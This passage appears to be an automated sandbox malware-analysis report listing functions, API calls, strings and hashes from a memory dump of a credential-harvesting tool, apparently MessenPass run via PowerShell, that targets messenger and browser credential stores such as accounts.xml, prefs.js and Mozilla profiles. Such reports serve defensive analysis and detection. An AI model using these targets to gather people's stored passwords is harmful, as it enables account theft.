        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: SHGetSpecialFolderPathA$shell32.dll
        • API String ID: 2574300362-543337301
        • Opcode ID: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
        • Instruction ID: a03a44e40ad870f41b9c2d8f2e6b277420dcc77a40eb9148cfb32e265f33a348
        • Opcode Fuzzy Hash: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
        • Instruction Fuzzy Hash: 2ED0C978A00302EBEB20DF61BD597D63FA8A74C711F20C036F905D2262DBB865D0CA2C
        Function 00412D65 Relevance: 6.3, APIs: 5, Instructions: 81COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??2@$memset
        • String ID:
        • API String ID: 1860491036-0
        • Opcode ID: 39eec9e8f364713fb9ebedea39b78bb371c8d5d8ce807c4bf4127dc0ebf7dabd
        • Instruction ID: 077d2ad6405c458e4821e20ddf5ab0b81a66c3d9f88b424bd3f36c9f492752c9
        • Opcode Fuzzy Hash: 39eec9e8f364713fb9ebedea39b78bb371c8d5d8ce807c4bf4127dc0ebf7dabd
        • Instruction Fuzzy Hash: F0310AB4A007008FDB609F2AD945692FBF4FF84305F25886FD549CB262D7B8D491CB19
        Function 004116A9 Relevance: 6.3, APIs: 5, Instructions: 51stringCOMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _strcmpistrchr$_mbscpymemsetstrrchr
        • String ID:
        • API String ID: 274398480-0
        • Opcode ID: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
        • Instruction ID: 328b4c9133cd54f2635944cbca80cb08cea31e8af7c0159c33255436c65d5f23
        • Opcode Fuzzy Hash: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
        • Instruction Fuzzy Hash: C601D6756082087AEB20BB72DC03FCB3B9C8F1175AF10005FF689A50D1EEA8D6C146AD
        Function 0040C9C7 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$memcpy
        • String ID:
        • API String ID: 368790112-0
        • Opcode ID: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
        • Instruction ID: 72ff1d110960cc82dd2bfc388b685e2dd0a1937d99bf851f24f672c8116534dd
        • Opcode Fuzzy Hash: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
        • Instruction Fuzzy Hash: 4C0128B1740B00B6D231EF29DC43F6A7BA49F91B18F100B1EF1526A6C1E7B8B244865D
        Function 0040AE7D Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0040972B: ??2@YAPAXI@Z.MSVCRT ref: 0040974C
          • Part of subcall function 0040972B: ??3@YAXPAX@Z.MSVCRT ref: 00409813
        • strlen.MSVCRT ref: 0040AEA3
        • atoi.MSVCRT ref: 0040AEB1
        • _mbsicmp.MSVCRT ref: 0040AF04
        • _mbsicmp.MSVCRT ref: 0040AF17
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbsicmp$??2@??3@atoistrlen
        • String ID:
        • API String ID: 4107816708-0
        • Opcode ID: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
        • Instruction ID: 08bf478f3eb11018bf028c01ffb7f168253fa3ae9792e106a9a4f60ade7b3b20
        • Opcode Fuzzy Hash: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
        • Instruction Fuzzy Hash: B8414975900305EFCB11DF69D580A9ABBF4FB48308F1084BAEC15AB392D778DA51CB59
        Function 00413646 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen
        • String ID: >$>$>
        • API String ID: 39653677-3911187716
        • Opcode ID: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
        • Instruction ID: dc7a302430b06bbc29ce8331a0d654e54ba56492e0c60a2da2e35593be10561b
        • Opcode Fuzzy Hash: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
        • Instruction Fuzzy Hash: 7B31FBA580D2C4AED7219F6880557EEFFA14F22305F1886DAC0D447383C22C9BCAD75A
        Function 0040EA56 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040EA89
        • strlen.MSVCRT ref: 0040EA8F
        • strlen.MSVCRT ref: 0040EA9C
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$_mbscat_mbscpymemset
        • String ID: accounts.xml
        • API String ID: 581844971-666780623
        • Opcode ID: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
        • Instruction ID: 3a6749a91d87314aa81efbea2023e77c1fe97455d9ba7aea10baf3c7dddfb932
        • Opcode Fuzzy Hash: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
        • Instruction Fuzzy Hash: 9C210471A041186BCB10EB66DC416DFB7F8AF55314F0484BBE009E7142DBB8EA958FE8
        Function 0040EB3D Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040EB70
        • strlen.MSVCRT ref: 0040EB76
        • strlen.MSVCRT ref: 0040EB83
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$_mbscat_mbscpymemset
        • String ID: accounts.xml
        • API String ID: 581844971-666780623
        • Opcode ID: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
        • Instruction ID: f45e0dada1ac7c46e734b25b908a600237734d5f3cbc55dd7ef5ba4cf50aaebb
        • Opcode Fuzzy Hash: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
        • Instruction Fuzzy Hash: AD21F5719041185BDB11EB26DC41ACA77BC5F51314F0484BBA508E7141DBB8EAD68FD8
        Function 00407364 Relevance: 6.1, APIs: 4, Instructions: 65stringCOMMON
        Download Yara Rule
        APIs
        • strlen.MSVCRT ref: 00407375
          • Part of subcall function 00406982: malloc.MSVCRT ref: 0040699E
          • Part of subcall function 00406982: memcpy.MSVCRT ref: 004069B6
          • Part of subcall function 00406982: ??3@YAXPAX@Z.MSVCRT ref: 004069BF
        • ??3@YAXPAX@Z.MSVCRT ref: 00407398
        • ??3@YAXPAX@Z.MSVCRT ref: 004073BB
        • memcpy.MSVCRT ref: 004073DB
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??3@$memcpy$mallocstrlen
        • String ID:
        • API String ID: 1171893557-0
        • Opcode ID: 8daacff24f09ec1835eef878112350759b5147539b71cc7ee53649a8fd930fc3
        • Instruction ID: d47861f91907e87d10e443503ad883c0cefe0bd36095b640ea2ff485cde935f6
        • Opcode Fuzzy Hash: 8daacff24f09ec1835eef878112350759b5147539b71cc7ee53649a8fd930fc3
        • Instruction Fuzzy Hash: 53218C71204604AFD730DF18E881996B7F5EF04324B208A2EFC6A9B6D1C735FA59CB55
        Function 00407944 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??2@??3@memcpymemset
        • String ID:
        • API String ID: 1865533344-0
        • Opcode ID: e2cfaa68213c0131ff58227f61e715dee9609dc152932ae150db42a1ac1bab38
        • Instruction ID: be4f301e428eab7478e357bf13cd6827c7edeb2881237a21e1a336ab79825493
        • Opcode Fuzzy Hash: e2cfaa68213c0131ff58227f61e715dee9609dc152932ae150db42a1ac1bab38
        • Instruction Fuzzy Hash: C8116DB1608601AFE329DF19D881A26F7E5FF88300F20892EE4DA87391D635E841CB55
        Function 0040E4B6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040E4DF
        • strlen.MSVCRT ref: 0040E4EA
        • strlen.MSVCRT ref: 0040E4F8
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$_mbscat_mbscpymemset
        • String ID: prefs.js
        • API String ID: 581844971-3783873740
        • Opcode ID: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
        • Instruction ID: 18aa10c61fb3677f8c34c5df747d0d2d010b9cd1cf1f562783039ea2ec755a14
        • Opcode Fuzzy Hash: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
        • Instruction Fuzzy Hash: 9C01C87190011CBADB11EA95EC42BCABBAC9F0531DF1008BBE604E2181E7B49B948794
        Function 0040D4E9 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040D516
        • strlen.MSVCRT ref: 0040D52E
        • strlen.MSVCRT ref: 0040D53C
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$_mbscat_mbscpymemset
        • String ID: Mozilla\Profiles
        • API String ID: 581844971-2796945589
        • Opcode ID: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
        • Instruction ID: 3c6ae931ffe100bc814a6c4c739c4374e257fa1fb59e82d364b3a540d615c615
        • Opcode Fuzzy Hash: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
        • Instruction Fuzzy Hash: 2201F07290821466D711A6699C42FCA779C4F21759F2404BBF5C5F31C2EDB899C443A9
        Function 0040D578 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040D5A5
        • strlen.MSVCRT ref: 0040D5BD
        • strlen.MSVCRT ref: 0040D5CB
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$_mbscat_mbscpymemset
        • String ID: .purple
        • API String ID: 581844971-1504268026
        • Opcode ID: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
        • Instruction ID: 5dc147b8957afa7b06b9bacfad0a4e1db4396cb0d3e541dfcccdd27de6d8d665
        • Opcode Fuzzy Hash: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
        • Instruction Fuzzy Hash: 8C0120725081146AD711A669DC42BCA779C4F21709F2404BFF5C5F71C2FEB899C543AD
        Function 0040D607 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040D634
        • strlen.MSVCRT ref: 0040D64C
        • strlen.MSVCRT ref: 0040D65A
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$_mbscat_mbscpymemset
        • String ID: .gaim
        • API String ID: 581844971-3490432478
        • Opcode ID: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
        • Instruction ID: a115bc8fa66553d394cd4cab83c679d7ef9605289ec37c5517f9616187ac7207
        • Opcode Fuzzy Hash: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
        • Instruction Fuzzy Hash: 540120729082546AD721A6699C42BCB779C4F21709F2008BFF5C8F31C2EEBC5AC543A9
        Function 0040D696 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040D6C3
        • strlen.MSVCRT ref: 0040D6DB
        • strlen.MSVCRT ref: 0040D6E9
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$_mbscat_mbscpymemset
        • String ID: Miranda
        • API String ID: 581844971-4004425691
        • Opcode ID: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
        • Instruction ID: c142bb7588fded06bca0c3959130fc7bc280b220a29219a6f5312b9b0058b910
        • Opcode Fuzzy Hash: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
        • Instruction Fuzzy Hash: 180120769081146AD721BA699C42BDA779C4F21709F2404BBF5C4F31C2EEB859C543BD
        Function 0040623F Relevance: 6.0, APIs: 4, Instructions: 48COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbscpy
        • String ID:
        • API String ID: 714388716-0
        • Opcode ID: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
        • Instruction ID: dce8e19ef7dbf3e453dc58d21b67a2b53133f69bc0796553bf20bccd0e5dc17f
        • Opcode Fuzzy Hash: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
        • Instruction Fuzzy Hash: 310144769002089BCB22EBA5DC85EDB77BCAF88305F0004ABF54797141EF38A7C48B54
        Function 0040B15B Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
          • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
        • sprintf.MSVCRT ref: 0040B181
        • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B1E4
          • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
          • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
        • sprintf.MSVCRT ref: 0040B1AB
        • _mbscat.MSVCRT ref: 0040B1BE
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
        • String ID:
        • API String ID: 203655857-0
        • Opcode ID: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
        • Instruction ID: ecab945e31bd422c391273073b57af520698e657e98585e8788b6dab187b6cf3
        • Opcode Fuzzy Hash: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
        • Instruction Fuzzy Hash: 0E0167B25003046AD721B775DC86FEB73AC6B04704F14046FB655B6182EA79EA848A68
        Function 00405E4A Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 00405E6C
        • strlen.MSVCRT ref: 00405E74
        • strlen.MSVCRT ref: 00405E81
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$_mbscat_mbscpymemset
        • String ID: nss3.dll
        • API String ID: 581844971-2492180550
        • Opcode ID: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
        • Instruction ID: 0509c7bfbc4d162460136cac1117631891986418d94c1b22c83112455de3b5d3
        • Opcode Fuzzy Hash: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
        • Instruction Fuzzy Hash: 44F0CD7140C1186BDB10E769DC45FDA7BAC8F61719F1000B7F589E60C1DAB8ABC546A5
        Function 0040A6B4 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040A6D7
        • memset.MSVCRT ref: 0040A6ED
          • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
          • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
        • sprintf.MSVCRT ref: 0040A717
          • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
          • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
        • String ID: </%s>
        • API String ID: 3699762281-259020660
        • Opcode ID: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
        • Instruction ID: 76c63a3487c2ea4e5ea40729799977580a4d7530bed5194a5a383ad1b54ece87
        • Opcode Fuzzy Hash: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
        • Instruction Fuzzy Hash: EB01F97290012977D720A719CC46FDE7B6CAF55705F0400FAB50DF3142EA749B848BA5
        Function 0040783B Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 35stringCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00407930: FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
          • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
          • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
        • strlen.MSVCRT ref: 00407862
        • strlen.MSVCRT ref: 0040786F
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$CloseFind_mbscat_mbscpymemcpy
        • String ID: *.*$B@
        • API String ID: 470300861-2086290067
        • Opcode ID: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
        • Instruction ID: 1d68107b6d1fc83258085f2e46244374cde2cc5f318db11bb1f65da7a858b60d
        • Opcode Fuzzy Hash: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
        • Instruction Fuzzy Hash: C7F0E972D082166FD200AA66984599BBB9C8F52729F11443FF808B7142D63D6D0643AF
        Function 00411F43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47libraryloaderCOMMON
        Download Yara Rule
        APIs
        • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,00411FF1), ref: 00411F53
        • GetProcAddress.KERNEL32(00000000,?), ref: 00411FB7
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: ntdll.dll
        • API String ID: 2574300362-2227199552
        • Opcode ID: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
        • Instruction ID: c3f2c9e477f8672f67090740fae2e549de1e6c2fb6487af2d15ed3ca5984443d
        • Opcode Fuzzy Hash: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
        • Instruction Fuzzy Hash: DC110D20D0C6C9EDEB12C7ACC4087DEBEF55B16709F0880E8C585A6292C7BA5658C776
        Function 0040923A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 00409252
        • SendMessageA.USER32(?,00001019,00000000,?), ref: 00409281
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: MessageSendmemset
        • String ID: "
        • API String ID: 568519121-123907689
        • Opcode ID: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
        • Instruction ID: 143eebe103db385490b988b1a572ada648b34fe061aa254f91e3f3e50342256c
        • Opcode Fuzzy Hash: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
        • Instruction Fuzzy Hash: 0A01A275800205FBDB218F95C845AAFB7B8FF84B59F00842DE854A6281E3349945CB69
        Function 0040C3AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39registryCOMMON
        Download Yara Rule
        APIs
        • RegisterClassA.USER32(?), ref: 0040C3F0
        • CreateWindowExA.USER32(00000000,MessenPass,MessenPass,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000), ref: 0040C418
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ClassCreateRegisterWindow
        • String ID: MessenPass
        • API String ID: 3469048531-1347981195
        • Opcode ID: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
        • Instruction ID: df568ce2afab08691587747be1d5034a2dd7dfffecd18501b630fd2d0d2d029c
        • Opcode Fuzzy Hash: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
        • Instruction Fuzzy Hash: 0701E8B5D00608AFDB11CF9ACD49ADFFFF8EB89704F10802BE541A6250D7B46640CB68
        Function 0040F94E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
        Download Yara Rule
        APIs
        • SetFilePointer.KERNEL32(0040F292,?,00000000,00000000,00418AF8,00000000,?,?,0040F8C4,?,00000000,?,76232EE0), ref: 0040F968
        • memset.MSVCRT ref: 0040F973
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: FilePointermemset
        • String ID: .#v
        • API String ID: 352010112-507759092
        • Opcode ID: b08b37efe74314bc7153cc0f7b1b12a441d4564d3bf1687e310da48c4f7abb59
        • Instruction ID: c9e48e0178ef7986bf6f062653ffe96eb337f7ac86c8b5f60fa1fdd839f5e59a
        • Opcode Fuzzy Hash: b08b37efe74314bc7153cc0f7b1b12a441d4564d3bf1687e310da48c4f7abb59
        • Instruction Fuzzy Hash: 5DF05E72900208FFDB216F67CD05D9FBBB9EB81759B01803EF909A1410D2359E15DBA4
        Function 00408A29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
        Download Yara Rule
        APIs
        • LoadMenuA.USER32(00000000), ref: 00408A31
        • sprintf.MSVCRT ref: 00408A54
          • Part of subcall function 004088D4: GetMenuItemCount.USER32(?), ref: 004088EA
          • Part of subcall function 004088D4: memset.MSVCRT ref: 0040890E
          • Part of subcall function 004088D4: GetMenuItemInfoA.USER32(?), ref: 00408944
          • Part of subcall function 004088D4: memset.MSVCRT ref: 00408971
          • Part of subcall function 004088D4: strchr.MSVCRT ref: 0040897D
          • Part of subcall function 004088D4: _mbscat.MSVCRT ref: 004089D8
          • Part of subcall function 004088D4: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 004089F4
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
        • String ID: menu_%d
        • API String ID: 1129539653-2417748251
        • Opcode ID: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
        • Instruction ID: 6e6fd20b795a8bab19114a67d1783e5b01d02cb8a2ade4a69635827cbafc1364
        • Opcode Fuzzy Hash: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
        • Instruction Fuzzy Hash: EBD0C232A0030076E61033276C0EFCB29195BD2B19F54807FF400710C5DEBD018487AC
        Function 00406BC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
        Download Yara Rule
        APIs
        • GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
        • _mbscpy.MSVCRT ref: 00406BE8
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: DirectoryWindows_mbscpy
        • String ID: XA
        • API String ID: 257536871-3740220071
        • Opcode ID: 861364e7de9ee2ae089174bca0caadeda4635289f72fc20d00e4fde06078ff85
        • Instruction ID: 8f816420b632b6a764ea2497921bafe0203b6dc712d69cfd7b43a4c86b5ca7f0
        • Opcode Fuzzy Hash: 861364e7de9ee2ae089174bca0caadeda4635289f72fc20d00e4fde06078ff85
        • Instruction Fuzzy Hash: 47D05E7540C260BFF7109B12FC45AC63FE4EF49334F10803AF804961A0EB746981869C
